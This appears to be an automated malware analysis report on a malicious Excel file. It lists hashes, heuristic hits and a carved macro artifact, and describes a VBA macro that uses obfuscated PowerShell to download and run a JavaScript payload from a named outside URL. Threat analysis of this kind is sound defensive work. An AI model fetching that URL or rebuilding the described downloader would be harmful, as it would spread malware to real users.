Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 5b35ee161073781a…

MALICIOUS

Office (OLE) / .XLS

33.0 KB Created: 2015-06-05 18:17:20 Authoring application: Microsoft Excel First seen: 2022-10-12
MD5: 99df9946cb44e65a25d1d6dc3c264d0f SHA-1: a1d2a73e79abb0fbc792b71480814988cfd6a40c SHA-256: 5b35ee161073781a71c51ddf6416fdfca862887d5dfd4e22d2914c816dc32093
100 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The embedded VBA macro contains obfuscated PowerShell commands. The script reconstructs the URL 'http://nedremmer.com/paradigm/client/download.js' and attempts to download and execute a JavaScript file named 'notapad.js' from the temporary directory. This indicates a downloader or droppper functionality.

Heuristics 3

  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas
c0ad471d207a7af4c24b5b4392366c67c5245df368ed4acc655eb0d592346745		 vba-macro oletools.olevba.extract_macros (decoded VBA source) 1493 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.